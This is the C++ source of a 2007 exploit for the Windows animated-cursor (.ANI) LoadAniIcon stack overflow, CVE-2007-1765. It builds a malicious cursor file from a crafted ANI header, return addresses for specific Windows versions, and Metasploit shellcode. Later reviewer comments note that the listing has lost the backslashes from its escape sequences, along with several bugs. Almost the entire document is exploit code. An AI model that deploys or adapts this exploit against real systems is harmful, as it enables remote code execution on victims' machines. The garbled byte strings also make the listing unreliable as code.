# Title : MS Windows Animated Cursor (.ANI) Stack Overflow Exploit
# Published : 2007-03-31
# Author : devcode
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
* This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include <iostream>
#include <windows.h>
/* ANI Header: the fixed file prefix that main() copies to the start of
 * the 1024-byte output buffer (sizeof - 1 drops the string's terminating
 * NUL). Read as \x escapes, the leading groups spell the RIFF / ACON /
 * anih tags of an animated-cursor container.
 * NOTE(review): as printed, the escape sequences have lost their
 * backslashes ("x52x49..."), so this literal is plain ASCII text rather
 * than the byte sequence the comments describe; the file this program
 * writes is therefore not a valid RIFF container as listed here. */
unsigned char uszAniHeader[] =
"x52x49x46x46x00x04x00x00x41x43x4Fx4Ex61x6Ex69x68"
"x24x00x00x00x24x00x00x00xFFxFFx00x00x0Ax00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x10x00x00x00x01x00x00x00x54x53x49x4Cx03x00x00x00"
"x10x00x00x00x54x53x49x4Cx03x00x00x00x02x02x02x02"
"x61x6Ex69x68xA8x03x00x00";
/* Shellcode - metasploit exec calc.exe ^^
 * Payload blob that main() copies to offset 192 of the output buffer
 * (sizeof - 1 drops the terminating NUL). The author's comment identifies
 * it as a Metasploit "exec calc.exe" payload; nothing in this file
 * decodes or validates it.
 * NOTE(review): the escape sequences have lost their backslashes in this
 * listing, so as printed this is ASCII text, not executable bytes. */
unsigned char uszShellcode[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42"
"x58x50x30x41x31x42x41x6bx41x41x52x32x41x42x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a"
"x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c"
"x4bx73x4cx74x45x31x68x54x41x68x6fx6cx4bx70x4fx57"
"x68x6ex6bx71x4fx45x70x65x51x5ax4bx67x39x4cx4bx50"
"x34x4cx4bx77x71x68x6ex75x61x4bx70x4ex79x6ex4cx4d"
"x54x4bx70x72x54x65x57x69x51x49x5ax46x6dx37x71x6f"
"x32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7a"
"x45x6cx4bx53x6fx51x34x37x71x48x6bx51x76x4cx4bx76"
"x6cx50x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65"
"x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78"
"x43x74x71x49x50x30x64x6ex6bx43x70x44x70x4cx45x4f"
"x30x41x68x44x4cx4ex6bx63x70x44x4cx6ex6bx30x70x65"
"x4cx4ex4dx6cx4bx30x68x75x58x7ax6bx35x59x4cx4bx4d"
"x50x58x30x37x70x47x70x77x70x6cx4bx65x38x57x4cx31"
"x4fx66x51x48x76x65x30x70x56x4dx59x4ax58x6ex63x69"
"x50x31x6bx76x30x55x38x5ax50x4ex6ax36x64x63x6fx61"
"x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4fx4bx57x70"
"x63x51x71x32x4cx52x43x37x70x42";
/* Banner and usage text printed by main() when fewer than two arguments
 * are given. The menu numbers the targets 1..3, whereas the targets[]
 * table below is indexed 0..2 (see the note in main()).
 * NOTE(review): the \n and \t escapes have lost their backslashes in this
 * listing, so as printed the banner contains literal 'n'/'t' characters
 * and no line breaks. */
char szIntro[] =
"nttWindows .ANI LoadAniIcon Stack Overflown"
"tttdevcode (c) 2007n"
"[+] Targets:n"
"t(1) Windows XP SP2n"
"t(2) Kernel32.dll (ExitProcess)n"
"t(3) Windows 2K SP4nn"
"Usage: ani.exe <target> <file>";
/* One selectable target: a display name (never printed by this program)
 * and the 4 bytes that main() copies to offset 168 of the output buffer.
 * uszRet is 5 bytes so that a 4-byte value written as a string literal
 * still has room for its terminating NUL. */
typedef struct {
    const char *szTarget;     /* human-readable name, unused by main() */
    unsigned char uszRet[5];  /* 4 payload bytes + NUL; only 4 are copied */
} TARGET;
/* Target table, indexed 0..2 directly by atoi(argv[1]) in main().
 * Entry 1 is intended as four 0x90 placeholders that main() overwrites at
 * run time with whatever GetProcAddress() returns for "ExitProcess".
 * NOTE(review): as printed, the escape sequences have lost their
 * backslashes, so these initializers are 12-character strings that do
 * not fit uszRet[5]; a C compiler warns (C++ rejects) such initializers. */
TARGET targets[] = {
{ "Windows XP SP2", "xC9x29xD4x77" }, /* call esp */
{ "Kernel32.dll (ExitProcess)", "x90x90x90x90" }, /* ExitProcess, patched in main() */
{ "Windows 2K SP4", "x29x4CxE1x77" }
};
/*
 * Entry point.  Usage: ani.exe <target> <file>
 *
 * Fills a 1024-byte buffer with 0x90, lays uszAniHeader at offset 0, the
 * selected targets[].uszRet value at offset 168 and uszShellcode at offset
 * 192, then writes the whole buffer to <file>.  Every path, including the
 * error paths, returns 0, so the exit status cannot be used to detect
 * failure.
 *
 * Relies on printf/memset/memcpy/fopen/atoi; the only includes are
 * <iostream> and <windows.h>, so this was presumably built as C++ with a
 * toolchain that pulls the C headers in transitively — TODO confirm.
 */
int main( int argc, char **argv ) {
    char szBuffer[1024];      /* complete file image, NOP-filled below */
    FILE *f;
    void *pExitProcess[4];    /* only element [0] is ever written or read */

    if ( argc < 3 ) {
        /* Too few arguments: print the banner/usage and exit "successfully". */
        printf("%sn", szIntro );
        return 0;
    }

    /* Target 1 only: replace the placeholder bytes in targets[1].uszRet with
     * the run-time address of kernel32!ExitProcess on this machine. */
    if ( atoi( argv[1] ) == 1 ) {
        printf("[+] Getting ExitProcess address...n");
        *pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ),
            "ExitProcess" );
        /* NOTE(review): this compares the address of the local array, which
         * is never NULL, so a failed lookup (pExitProcess[0] == NULL) is not
         * caught and four zero bytes are copied into the table instead. */
        if ( pExitProcess == NULL ) {
            printf("[-] Cannot get ExitProcess addressn");
            return 0;
        }
        /* Copies 4 bytes: the low 32 bits of the pointer on 32-bit builds. */
        memcpy( targets[1].uszRet, pExitProcess, 4 );
    }

    printf("[+] Creating ANI header...n");
    memset( szBuffer, 0x90, sizeof( szBuffer ) );
    /* sizeof - 1 drops the string literal's terminating NUL. */
    memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

    printf("[+] Copying shellcode...n");
    /* NOTE(review): atoi(argv[1]) indexes targets[] (valid 0..2) with no
     * range check.  The banner numbers the targets 1..3, so "1" selects the
     * Kernel32 entry patched above, "2" selects the 2K SP4 entry, "3" reads
     * past the end of the table, and non-numeric input maps to 0. */
    memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
    memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

    /* "wb": binary mode so the 0x90 filler and embedded bytes are written
     * without newline translation on Windows. */
    f = fopen( argv[2], "wb" );
    if ( f == NULL ) {
        printf("[-] Cannot create filen");
        return 0;
    }
    /* Return values of fwrite() and fclose() are not checked: a short or
     * failed write is still reported as success below. */
    fwrite( szBuffer, 1, 1024, f );
    fclose( f );
    printf("[+] .ANI file succesfully created!n");
    return 0;
}